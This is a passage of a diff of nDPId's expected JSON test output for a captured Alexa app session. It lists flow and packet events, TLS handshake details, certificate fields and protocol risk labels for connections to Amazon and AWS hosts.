{"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01107{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2929,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196016,"flow_last_seen":1490976196143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196143,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976071237,"flow_last_seen":1490976075957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976076275,"flow_last_seen":1490976077663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1490976071286,"flow_last_seen":1490976075975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8626,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976071306,"flow_last_seen":1490976075950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5104,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071349,"flow_last_seen":1490976075957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4754,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071380,"flow_last_seen":1490976075949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6831,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976071385,"flow_last_seen":1490976075957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":675,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976071583,"flow_last_seen":1490976075957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196223,"flow_last_seen":1490976196223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196223,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1490976196223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196223,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Y0xAAEAG+qKsECrYNFXRj5ZTAbu3TOm6AAAAAKAC\/\/+mLwAAAgQFtAQCCAoA9or2AAAAAAEDAwg="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1490976196257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196257,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7llOp3LO0t0zpu6AScSBd6wAAAgQFtAQCCApt5QucAPaK9gEDAwg="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1490976196259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196259,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0Y01AAEAG+qmsECrYNFXRj5ZTAbu3TOm7qdyztYAQAVf8fgAAAQEICgD2ivlt5Quc"} -01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196223,"flow_last_seen":1490976196261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196261,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01133{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2950,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196223,"flow_last_seen":1490976196300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1490976196300,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01606{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2952,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196223,"flow_last_seen":1490976196301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3656,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1490976196301,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195983,"flow_last_seen":1490976195983,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195983,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1490976195983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195983,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8wa5AAEAGL16sECrYNFQ+c6O4AbsdU0twAAAAAKAC\/\/9kRAAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195984,"flow_last_seen":1490976195984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195984,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1490976195984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195984,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8CnNAAEAG5pmsECrYNFQ+c6O5Abv6a4CtAAAAAKAC\/\/9R7QAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2867,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195985,"flow_last_seen":1490976195985,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195985,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2867,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1490976195985,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195985,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8MZ1AAEAGv2+sECrYNFQ+c6O6AbtYObtDAAAAAKAC\/\/+5iAAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":1490976196000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196000,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7kDZGUl+muArqAScSCFQwAAAgQFtAQCCAps+oX0APaK3gEDAwg="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2870,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1490976196001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196001,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7jUvy2sHVNLcaAScSD3DwAAAgQFtAQCCAps+oycAPaK3gEDAwg="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1490976196002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196002,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0CnRAAEAG5qCsECrYNFQ+c6O5Abv6a4CuA2RlJoAQAVcj2AAAAQEICgD2iuBs+oX0"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1490976196003,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196003,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0wa9AAEAGL2WsECrYNFQ+c6O4AbsdU0tx1L8trYAQAVeVpAAAAQEICgD2iuBs+oyc"} 
+00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195984,"flow_last_seen":1490976196003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196003,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195983,"flow_last_seen":1490976196005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196005,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1490976196008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196008,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7r33SsOWDm7RKAScSApGwAAAgQFtAQCCAps+o9VAPaK3gEDAwg="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1490976196009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MZ5AAEAGv3asECrYNFQ+c6O6AbtYObtE990rD4AQAVfHrwAAAQEICgD2iuBs+o9V"} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195985,"flow_last_seen":1490976196010,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196010,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196016,"flow_last_seen":1490976196016,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196016,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1490976196016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196016,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8LWlAAEAG4smsECrYNu8csuLAAbtkEKeIAAAAAKAC\/\/+hiQAAAgQFtAQCCAoA9orhAAAAAAEDAwg="} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195984,"flow_last_seen":1490976196033,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196033,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195984,"flow_last_seen":1490976196034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196034,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} 
+00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195985,"flow_last_seen":1490976196037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2890,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195985,"flow_last_seen":1490976196038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196038,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
